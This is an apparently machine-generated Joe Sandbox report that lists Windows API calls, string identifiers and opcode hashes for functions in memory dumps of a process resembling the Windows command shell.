• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 001B41B9
• _get_osfhandle.MSVCRT ref: 001B41CA
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 001B4205
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B426C
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,001B9E02,?,00000010), ref: 001B4283
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B4292
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B42B1
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B42C4
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001B42D2
• RtlFreeHeap.NTDLL(00000000), ref: 001B42D9
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001B432F
• RtlFreeHeap.NTDLL(00000000), ref: 001B4336
• _wcsnicmp.MSVCRT ref: 001B43DB
• _wcsnicmp.MSVCRT ref: 001B43F0
• _wcsnicmp.MSVCRT ref: 001B4405
• _wcsnicmp.MSVCRT ref: 001B441A
• _wcsnicmp.MSVCRT ref: 001B442F
• _wcsnicmp.MSVCRT ref: 001B4444
• _wcsnicmp.MSVCRT ref: 001B4459
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 001B44A5
• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 001B44F0
• FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 001B4506
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 001B451D
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001B4565
• RtlFreeHeap.NTDLL(00000000), ref: 001B456C
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 001B4595
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001B459C
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B45C3
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,001B9E02,?,00000000), ref: 001B45D4
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B45DD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
• String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
• API String ID: 2991647268-3100821235
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID:
• String ID: [...]$ [..]$ [.]$...$:
• API String ID: 0-1980097535
APIs
• GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001BE590,?,00002000), ref: 00196896
• SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001968AA
• FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 001968BE
• FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001968D2
• realloc.MSVCRT ref: 001AA5E7
  • Part of subcall function 00198791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00196906,0000001F,?,00000080), ref: 00198791
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00196907
• GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 0019698F
• memmove.MSVCRT(?,?,?), ref: 00196A86
• GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00196AAF
• realloc.MSVCRT ref: 00196ACA
• GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00196AFE
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
• String ID: %02d%s%02d%s%02d$%s $%s %s
• API String ID: 2927284792-4023967598
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A4F03
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 001A4F67
                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 001A4F77
                                                                                                                                                                                                                          • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00192670,?,?,?,-00000001), ref: 001A4FEB
                                                                                                                                                                                                                          • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 001A5103
                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 001A511E
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 001A5141
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstmemset$Next
                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                          • API String ID: 3059144641-4282027825
                                                                                                                                                                                                                          • Opcode ID: 6388ae86abf1a76b951ab5d4b958babe66ee62131f8108795942f573c21124ad
                                                                                                                                                                                                                          • Instruction ID: e5b769b9dd4987b3306e2181f3587adfcc25c5e30703e1d70180064ab615e028
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6388ae86abf1a76b951ab5d4b958babe66ee62131f8108795942f573c21124ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AE1BE75A042099BDF24EBA8CC85BFE73B9EF69304F4404A9E909D7181E731AE85CB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 0019539C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: 4ceb19a37a536c41d63c1fdfee8444dd2f9aaa5272d859cff0743d040188cebf
                                                                                                                                                                                                                          • Instruction ID: f164941a74d490d13f425f7954d546385949ce727db130593173328f41c97272
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ceb19a37a536c41d63c1fdfee8444dd2f9aaa5272d859cff0743d040188cebf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AA1F3799001068BCF25DF78C8856BEB3B5FF55310F5585AAE94AE7240EB319EC1CB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(91B40133,00000000,?), ref: 001B7710
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B7722
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001BE590,00002000,?,001D8BF0,00000000,?,?,00198F0D), ref: 0019EC51
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 001B78BC
                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001B79F1
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00191F8C,00193B98), ref: 001B7B15
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,91B40133,00000000,?), ref: 001B7D0D
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B7D20
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                                                                                                                                                                          • String ID: %s $%s>$PROMPT$Unknown
                                                                                                                                                                                                                          • API String ID: 708651206-3050974680
                                                                                                                                                                                                                          • Opcode ID: a0b2f5035081a0d2695d4d4bcd6a32903ead2c5b786cfea33593bedf24bf7fed
                                                                                                                                                                                                                          • Instruction ID: 7044f8209ea922eaa6a1fd8e1376fc8d352f642c56e74ba53ba3b22896297517
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0b2f5035081a0d2695d4d4bcd6a32903ead2c5b786cfea33593bedf24bf7fed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4702F875A051169BCF24EF28CC49AFAB7B5EF84710F54819EE409E7290EB309E81DF94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001BC135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 001BC14E
                                                                                                                                                                                                                            • Part of subcall function 001BC135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 001BC16A
                                                                                                                                                                                                                            • Part of subcall function 001BC135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 001BC17B
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 001BC24F
                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 001BC270
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 001BC293
                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 001BC2AE
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BC2EF
                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 001BC324
                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?), ref: 001BC370
                                                                                                                                                                                                                          • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 001BC392
                                                                                                                                                                                                                          • RtlNtStatusToDosError.NTDLL ref: 001BC39D
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001BC3A4
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001BC3B6
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 001BC3D1
                                                                                                                                                                                                                          • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001BC3E2
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: memset.MSVCRT ref: 001BC62E
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: memset.MSVCRT ref: 001BC656
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 001BC6C7
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 001BC6E6
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 001BC72A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 223857506-0
                                                                                                                                                                                                                          • Opcode ID: 771af1b6d5f3f09dcbe15f0f5a85914630c4b0111eb35b649e7310f2212978eb
                                                                                                                                                                                                                          • Instruction ID: 1c65d72b68e1745b3e652720507095059cc778c656ef80c4b860a40a173dfee6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 771af1b6d5f3f09dcbe15f0f5a85914630c4b0111eb35b649e7310f2212978eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46518F75A01205AFDB149FB8DC45AFEB7B8FF88304B54816AF802E7251E7349E41CBA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001BE590,?,00002000), ref: 00199342
                                                                                                                                                                                                                          • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00199356
                                                                                                                                                                                                                          • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0019936A
                                                                                                                                                                                                                          • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0019937E
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 001ABC07
                                                                                                                                                                                                                          • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 001ABD31
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                          • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                                                                                                                                                                          • API String ID: 55602301-2516506544
                                                                                                                                                                                                                          • Opcode ID: 4a2732eaf79095ac121095e55a46a727d6748a2b38163c594df8ca9622bd3144
                                                                                                                                                                                                                          • Instruction ID: 4f8c6c6b9eea88130e605051dbe2ed870eb3c27b854d7593ad7539ebc3c26866
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a2732eaf79095ac121095e55a46a727d6748a2b38163c594df8ca9622bd3144
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6281F57AA002599BCF24DFA4CC84AFEB3B9EF45704F4441AAE809E7145EB359E85CB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?), ref: 001A58BB
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A58CD
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A5944
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A594B
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A596C
                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A5973
                                                                                                                                                                                                                          • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A598F
                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A59B6
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001B160B
                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001B1618
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3609286125-0
                                                                                                                                                                                                                          • Opcode ID: 2c89a2e7e75d4056ad186aeb2f688d2b7ed30bb46bfc6527f1e2b3b088bd2db4
                                                                                                                                                                                                                          • Instruction ID: 7175edea4d6cc9168c62910b811b0d1afa56da63e0a987fdd1f26a92f087026d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c89a2e7e75d4056ad186aeb2f688d2b7ed30bb46bfc6527f1e2b3b088bd2db4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E31F039206700EFCB148F24EC09B6E3BB6EF46339F644919F592876E0D7359885EB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 001A4782
                                                                                                                                                                                                                          • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 001A47D4
                                                                                                                                                                                                                          • RtlReleaseRelativeName.NTDLL(?), ref: 001A47E0
                                                                                                                                                                                                                          • RtlFreeUnicodeString.NTDLL(?), ref: 001A47EA
                                                                                                                                                                                                                            • Part of subcall function 001A4823: NtQueryVolumeInformationFile.NTDLL ref: 001A484F
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 001A480E
                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 001B096F
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B097D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 2968197161-2766056989
                                                                                                                                                                                                                          • Opcode ID: 5afd1a76a5c0d2a589fb6b690693a3803c67f633b7cf1d6623e659f9944e35f6
                                                                                                                                                                                                                          • Instruction ID: 9eabf7e92e0d2772ad49fcdb7ca72c46a954ce885dc99a9c410c39c8a09097cb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5afd1a76a5c0d2a589fb6b690693a3803c67f633b7cf1d6623e659f9944e35f6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6217C75E01209ABDB11DFE5DD88AEEBBB8AF48714F104126FA06F2251D7749E44CB60
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B7483
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B7495
                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 001B74BB
                                                                                                                                                                                                                          • fflush.MSVCRT ref: 001B74C9
                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B74E2
                                                                                                                                                                                                                          • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 001B74F8
                                                                                                                                                                                                                          • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B74FF
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B751C
                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 001B7524
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
